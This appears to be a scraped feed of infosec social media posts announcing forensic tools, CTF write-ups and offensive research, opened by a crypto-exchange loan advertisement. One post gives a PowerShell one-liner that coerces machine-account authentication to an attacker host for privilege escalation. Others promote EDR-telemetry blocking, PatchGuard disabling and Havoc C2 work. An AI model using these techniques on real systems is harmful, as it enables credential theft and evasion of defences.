🔥The 9th Round of Easy Loan, Earn $40 Reward is in progress❗️ ⏰ Promotion Period: January 15th - Feburary 15th, 2025 👉 Register now and check more details at gate.io/campaigns/358

Time to make volatility 3 compatible with modern Windows hibernation file analysis. Blog post : forensicxlab.com/posts/hibernat… Feature : tinyurl.com/5n8u4nr9 Special thanks to Chad Tilbury who gave me the motivation and Joe Sylve 🐘 @[email protected], Vico Marziale, Golden G. Richard III for the incredible work

I have made 2 writeups for #ECSC2023 and #DGhAck. For the 2nd one, I used github.com/naacbin/Covena… [1] Recovering PDF using DataRun of $LogFile > naacbin.gitlab.io/data-on-the-ru… [2] Decrypt empire C2 communication by extracting private key from memory > naacbin.gitlab.io/empire-c2/

Read our latest blog to find out how our Security Research Team reverse-engineered Windows Defender to uncover previously undocumented artefacts, which can now be recovered using Dissect! blog.fox-it.com/2023/12/14/rev…

Exegol holiday release is live 🎄🎁🎅 New remote graphical desktop, image entrypoint, container startup script, new tools, improved pipeline, doc, etc. Many big things! github.com/ThePorgs/Exego… github.com/ThePorgs/Exego… gg to the team Dramelac qu35t 👏 and all contributors.

OST cannot be stopped. Here is a technique we tested internally 9 months ago: blocking EDR telemetry by leveraging the Windows Filtering Platform. Considered it so evil that we didn't publish it that time. It was pointless, now here it is by Chris Au: github.com/netero1010/EDR…

Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵

Challenge time is now over ⏰ TL;DR - HTML injection - Axios DOM Based CSPP - Axios CSPP response overwrite gadget - jQuery DOM Clobbering + CSPP selector overwrite gadgets - Setting src attr to "javascript:" for each HTML node ➝ XSS Detailed writeup 👇 mizu.re/post/intigriti…

I did two write-ups about ETW. The first one will cover how to capture an ETW trace and covers a case-study using the WinInet provider to analyze Cobalt Strike. The second one covers how EDR are using the DotNetRuntime ETW. 1. github.com/DebugPrivilege… 2. github.com/DebugPrivilege…

I documented github.com/corkami/docs/b… and made 'low alignment PEs' (PoCs @ github.com/corkami/pocs/b…) around 2009 but I'm pretty sure this was known before. Any early case of ITW low-align PE ? cc @Hexacorn qkumba hasherezade ReWolf

Over the past few months, I've contributed on the github.com/mandiant/VM-Pa… repository to incorporate forensic packages. As a result, I've developed scripts to automate VM installation for reverse, maldev and forensic purposes. 👇 github.com/naacbin/SecLab

I just spent the last few months of my life reverse engineering the Windows 10 parallel loader and figuring out how it does concurrency. Updates have now been published! github.com/ElliotKillick/…

New lab 🏰 for the GOAD project 🥳: SCCM You can now test the SCCM/MECM attacks locally on Virtualbox or Vmware. More information here: mayfly277.github.io/posts/SCCM-LAB… Repository here : github.com/Orange-Cyberde… Thx again Kenji Endo for your help to building this !

Exciting news: VolWeb 2.0 is out! This digital forensics memory analysis platform leverages the capabilities of volatility 3 framework. With significant enhancements, it now offers improved flexibility and scalability! github.com/k1nd0ne/VolWeb. 1/8

I just published the long-awaited Part 2 to my PCIe blog post series - "All About Memory: MMIO, DMA, TLPs, and more!" This post also includes a companion experiment where I dive into what pcileech looks like over a PCIe protocol analyzer. Please enjoy! ctf.re/kernel/pcie/tu…

Here is my #Friday #giveaways! Like, retweet and share with your network... I'll randomly choose on Monday 4/1 two winners to get the full "C5W Certified Malware Analysis" course and certification for FREE... You should not miss this! #DFIR #Malware academy.cyber5w.com/courses/C5W-Ce…

I wrote a blogpost on injecting code into a PPL process on Windows 11, without abusing any vulnerable driver. blog.slowerzs.net/posts/pplsyste…

Didn't check the code yet, but looks like SilverPotato and CertifiedDCOM have a working public weaponized tool by now: github.com/CICADA8-Resear… That's huge news from my perspective🔥

Excited to share my latest article: PgC - a novel approach to disable Patchguard during runtime using basic memory management principles. It has worked against every version of Patchguard for the last 7 years, without needing any updates! blog.can.ac/2024/06/28/pgc…

I haven't posted anything about Havoc in a while so imma share something I have been working on. Wrote a custom VM/Interpreter (based on the RISC-V instruction set) to execute exploits and other arbitrary code. The client is now fully extendable and scriptable via the Python API